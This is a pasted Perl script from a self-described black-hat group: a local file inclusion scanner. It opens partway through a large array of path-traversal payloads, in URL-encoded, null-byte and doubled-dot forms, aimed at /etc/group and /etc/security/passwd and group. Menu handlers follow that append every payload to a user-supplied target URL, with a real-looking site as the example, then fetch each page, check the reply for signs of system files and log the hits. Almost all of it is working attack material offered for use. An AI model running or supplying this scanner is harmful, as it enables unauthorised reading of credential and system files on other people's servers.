F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","/etc/group%00","....%2F%2Fetc/group%00","....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group%00","//etc/group","....//etc/group","....//....//etc/group","....//....//....//etc/group","....//....//....//....//etc/group","....//....//....//....//....//etc/group","....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//....//etc/group","....//....//....//....//....//....//....//....//....//....//etc/group","//etc/group%00","....//etc/group%00","....//....//etc/group%00","....//....//....//etc/group%00","....//....//....//....//etc/group%00","....//....//....//....//....//etc/group%00","....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//....//etc/group%00","....//....//....//....//....//....//....//....//....//....//etc/group%00","/etc/security/passwd","../etc/security/passwd","../../etc/security/passwd","../../../etc/security/passwd","../../../../etc/security/passwd","../../../../../etc/security/passwd","../../../../../../etc/security/passwd","../../../../../../../etc/security/passwd","../../../../../../../../etc/security/passwd","../../../../../../../../../etc/security/passwd","../../../../../../../../../../etc/security/passwd","/etc/security/passwd%00","../etc/security/passwd%00","../../etc/security/passwd%00","../../../etc/security/passwd%00","../../../../etc/security/passwd%00","../../../../../etc/security/passwd%00","../../../../../../etc/security/passwd%00","../../../../../../../etc/security/passwd%00","../../../../../../../../etc/security/passwd%00","../../../../../../../../../etc/security/passwd%00","../../../../../../../../../../etc/security/passwd%00","%2Fetc%2Fsecurity%2Fpasswd","..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","%2Fetc%2Fsecurity%2Fpasswd%00","..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....//etc/security/passwd","....//....//etc/security/passwd","....//....//....//etc/security/passwd","....//....//....//....//etc/security/passwd","....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//....//etc/security/passwd","....//etc/security/passwd%00","....//....//etc/security/passwd%00","....//....//....//etc/security/passwd%00","....//....//....//....//etc/security/passwd%00","....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/security/passwd%00","/etc/security/passwd","../etc/security/passwd","../../etc/security/passwd","../../../etc/security/passwd","../../../../etc/security/passwd","../../../../../etc/security/passwd","../../../../../../etc/security/passwd","../../../../../../../etc/security/passwd","../../../../../../../../etc/security/passwd","../../../../../../../../../etc/security/passwd","../../../../../../../../../../etc/security/passwd","/etc/security/passwd%00","../etc/security/passwd%00","../../etc/security/passwd%00","../../../etc/security/passwd%00","../../../../etc/security/passwd%00","../../../../../etc/security/passwd%00","../../../../../../etc/security/passwd%00","../../../../../../../etc/security/passwd%00","../../../../../../../../etc/security/passwd%00","../../../../../../../../../etc/security/passwd%00","../../../../../../../../../../etc/security/passwd%00","%2Fetc%2Fsecurity%2Fpasswd","..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd","%2Fetc%2Fsecurity%2Fpasswd%00","..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00","....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd","....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00","....//etc/security/passwd","....//....//etc/security/passwd","....//....//....//etc/security/passwd","....//....//....//....//etc/security/passwd","....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//etc/security/passwd","....//....//....//....//....//....//....//....//....//....//etc/security/passwd","....//etc/security/passwd%00","....//....//etc/security/passwd%00","....//....//....//etc/security/passwd%00","....//....//....//....//etc/security/passwd%00","....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//etc/security/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/security/passwd%00","/etc/security/group","../etc/security/group","../../etc/security/group","../../../etc/security/group","../../../../etc/security/group","../../../../../etc/security/group","../../../../../../etc/security/group","../../../../../../../etc/security/group","../../../../../../../../etc/security/group","../../../../../../../../../etc/security/group","../../../../../../../../../../etc/security/group","/etc/security/group%00","../etc/security/group%00","../../etc/security/group%00","../../../etc/security/group%00","../../../../etc/security/group%00","../../../../../etc/security/group%00","../../../../../../etc/security/group%00","../../../../../../../etc/security/group%00","../../../../../../../../etc/security/group%00","../../../../../../../../../etc/security/group%00","../../../../../../../../../../etc/security/group%00","%2Fetc%2Fsecurity%2Fgroup","..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup","%2Fetc%2Fsecurity%2Fgroup%00","..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00","%2F%2Fetc/security/group","....%2F%2Fetc/security/group","....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group","%2F%2Fetc/security/group%00","....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00","//etc/security/group","....//etc/security/group","....//....//etc/security/group","....//....//....//etc/security/group","....//....//....//....//etc/security/group","....//....//....//....//....//etc/security/group","....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//....//etc/security/group","....//....//....//....//....//....//....//....//....//....//etc/security/group","//etc/security/group%00","....//etc/security/group%00","....//....//etc/security/group%00","....//....//....//etc/security/group%00","....//....//....//....//etc/security/group%00","....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//....//etc/security/group%00","....//....//....//....//....//....//....//....//....//....//etc/security/group%00");
  675. ######################################################################
  676. ######################################################################
  677.  
  678. #BHG
  679. #We Are : Net.Edit0r , A.Cr0x , 3H34N , Am!n , tHe.K!ll3r ,ArYaIeIrAn , G3n3Rall , Mr.XHat , NoL1m1t , Black Viper , Nitrojen90
  680. #www.Black-hg.org    Forum: www.black-hg.org/cc/
  681. if ($Menu == 1) {
  682.  
  683.   print "\n";
  684. print "Please Enter Target Like This http://www.nikamebel.com/index.php?page= \n";
  685. print "target: ";
  686. $Target =<STDIN>;
  687. chomp ($Target);
  688. print "\n";
  689. print  "PROGRESSING ....";
  690. print "\n";
  691.  
  692. foreach $Path(@Passwd){
  693. my $url=$Target;
  694. my $HACK = $url.$Path;
  695. my $Source = get $HACK;
  696.  
  697. if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
  698. else { $Message = "NOT FOUND LFI Vulnerability";}
  699. print "$HACK     =>    $Message\n";
  700. open (TEXT, '>>LFI.txt');
  701. print TEXT "\n$HACK   =>   $Message \n\n";
  702. close (TEXT);
  703. }
  704. }
  705. if ($Menu == 2) {
  706.  
  707.   print "\n";
  708. print "Please Enter Target Like This http://www.nikamebel.com/index.php?page= \n";
  709. print "target: ";
  710. $Target =<STDIN>;
  711. chomp ($Target);
  712. print "\n";
  713. print  "PROGRESSING ....";
  714. print "\n";
  715.  
  716. foreach $Path(@Environ){
  717. my $url=$Target;
  718. my $HACK = $url.$Path;
  719. my $Source = get $HACK;
  720.  
  721. if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
  722. else { $Message = "NOT FOUND LFI Vulnerability";}
  723. print "$HACK     =>    $Message\n";
  724. open (TEXT, '>>LFI.txt');
  725. print TEXT "\n$HACK   =>   $Message \n\n";
  726. close (TEXT);
  727. }
  728. }
  729. if ($Menu == 3) {
  730.  
  731.   print "\n";
  732. print "Please Enter Target Like This http://www.nikamebel.com/index.php?page= \n";
  733. print "target: ";
  734. $Target =<STDIN>;
  735. chomp ($Target);
  736. print "\n";
  737. print  "PROGRESSING ....";
  738. print "\n";
  739.  
  740. foreach $Path(@Shadow){
  741. my $url=$Target;
  742. my $HACK = $url.$Path;
  743. my $Source = get $HACK;
  744.  
  745. if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
  746. else { $Message = "NOT FOUND LFI Vulnerability";}
  747. print "$HACK     =>    $Message\n";
  748. open (TEXT, '>>LFI.txt');
  749. print TEXT "\n$HACK   =>   $Message \n\n";
  750. close (TEXT);
  751. }
  752. }
  753. if ($Menu == 4) {
  754.  
  755.   print "\n";
  756. print "Please Enter Target Like This http://www.nikamebel.com/index.php?page= \n";
  757. print "target: ";
  758. $Target =<STDIN>;
  759. chomp ($Target);
  760. print "\n";
  761. print  "PROGRESSING ....";
  762. print "\n";
  763.  
  764. foreach $Path(@Group){
  765. my $url=$Target;
  766. my $HACK = $url.$Path;
  767. my $Source = get $HACK;
  768.  
  769. if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
  770. else { $Message = "NOT FOUND LFI Vulnerability";}
  771. print "$HACK     =>    $Message\n";
  772. open (TEXT, '>>LFI.txt');
  773. print TEXT "\n$HACK   =>   $Message \n\n";
  774. close (TEXT);
  775. }
  776. }
  777. if ($Menu == 5) {
  778.  
  779.   print "\n";
  780. print "Please Enter Target Like This http://www.nikamebel.com/index.php?page= \n";
  781. print "target: ";
  782. $Target =<STDIN>;
  783. chomp ($Target);
  784. print "\n";
  785. print  "PROGRESSING ....";
  786. print "\n";
  787.  
  788. foreach $Path(@SecurityUser){
  789. my $url=$Target;
  790. my $HACK = $url.$Path;
  791. my $Source = get $HACK;
  792.  
  793. if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
  794. else { $Message = "NOT FOUND LFI Vulnerability";}
  795. print "$HACK     =>    $Message\n";
  796. open (TEXT, '>>LFI.txt');
  797. print TEXT "\n$HACK   =>   $Message \n\n";
  798. close (TEXT);
  799. } }
  800. if ($Menu == 6) {
  801.  
  802.   print "\n";
  803. print "Please Enter Target Like This http://www.nikamebel.com/index.php?page= \n";
  804. print "target: ";
  805. $Target =<STDIN>;
  806. chomp ($Target);
  807. print "\n";
  808. print  "PROGRESSING ....";
  809. print "\n";
  810.  
  811. foreach $Path(@SecurityPasswd){
  812. my $url=$Target;
  813. my $HACK = $url.$Path;
  814. my $Source = get $HACK;
  815.  
  816. if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
  817. else { $Message = "NOT FOUND LFI Vulnerability";}
  818. print "$HACK     =>    $Message\n";
  819. open (TEXT, '>>LFI.txt');
  820. print TEXT "\n$HACK   =>   $Message \n\n";
  821. close (TEXT);
  822. }
  823. }
  824. if ($Menu == 7) {
  825.  
  826.   print "\n";
  827. print "Please Enter Target Like This http://www.nikamebel.com/index.php?page= \n";
  828. print "target: ";
  829. $Target =<STDIN>;
  830. chomp ($Target);
  831. print "\n";
  832. print  "PROGRESSING ....";
  833. print "\n";
  834.  
  835. foreach $Path(@SecurityGroup){
  836. my $url=$Target;
  837. my $HACK = $url.$Path;
  838. my $Source = get $HACK;
  839.  
  840. if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
  841. else { $Message = "NOT FOUND LFI Vulnerability";}
  842. print "$HACK     =>    $Message\n";
  843. open (TEXT, '>>LFI.txt');
  844. print TEXT "\n$HACK   =>   $Message \n\n";
  845. close (TEXT);
  846. }
  847. }
  848.     if ($Menu == 8 ) {
  849.    
  850. print "\n";
  851. print "Please Enter Target Like This http://www.nikamebel.com/index.php?page= \n";
  852. print "target: ";
  853. $Target =<STDIN>;
  854. chomp ($Target);
  855. print "\n";
  856. print  "PROGRESSING ....";
  857. print "\n";
  858.  
  859. foreach $Path(@ALL){
  860. my $url=$Target;
  861. my $HACK = $url.$Path;
  862. my $Source = get $HACK;
  863.  
  864. if ($Source =~ m/root/i || m/usr/i || m/dev/i || m/:x:/i || m/var/i || m/bin/i) { $Message ="LFI Vulnerability FOUND";}
  865. else { $Message = "NOT FOUND LFI Vulnerability";}
  866. print "$HACK     =>    $Message\n";
  867. open (TEXT, '>>LFI.txt');
  868. print TEXT "\n$HACK   =>   $Message \n\n";
  869. close (TEXT);
  870. }
  871. }
  872. else {
  873. print "\n \t\tInvalid ID";
  874. goto start;
  875. }
  876. system("pause");
  877.  
  878. #########################################
  879. #########################################
  880. #########################################
  881.  
  882. Black Hat group Security Center
  883. Site: www.Black-hg.org
  884. Forum: www.Black-hg.org/cc/
  885. By G3n3Rall
  886. AnTi.SecurityBoy@Gmail.com
  887.  
  888. Bye.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement